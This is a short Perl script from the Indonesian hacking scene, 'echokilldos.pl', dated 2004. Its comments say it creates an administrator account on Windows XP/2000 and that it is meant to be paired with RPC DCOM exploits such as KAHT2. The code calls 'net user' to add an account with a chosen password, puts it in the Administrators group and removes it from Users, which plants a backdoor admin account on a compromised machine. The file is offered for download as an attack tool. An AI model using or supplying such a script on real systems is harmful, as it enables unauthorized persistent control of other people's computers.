# M4ret 2oo4 # berdasarkan ide dari the_Day :P # EchoKillDos digunakan untuk membuat account admin pada Windows XP, 2000 # kombinasikan dengan sploits RPC DCOM seperti KAHT2 dsb # echokilldos.pl printf"\n **********************************************************\n"; print " * *\n"; print " * echokilldos *\n"; print " * created && tested by y3dips on XP Operating Sys *\n"; print " * greetz : the_day (untuk idenya), moby, comex, z3r0byt3 *\n"; print " * echo-memberz, newbie_hacker, puji_tiwili* *\n"; print " * *\n"; printf" **********************************************************\n\n"; if(@ARGV == 2) { $user = $ARGV[0]; $pass = $ARGV[1]; { system(" net user $user $pass /add "); system(" net localgroup Administrators $user /add "); system(" net localgroup Users $user /delete "); } } else { print " [Gunakan] echokilldos.pl username password \n"; } # download from http://echo.or.id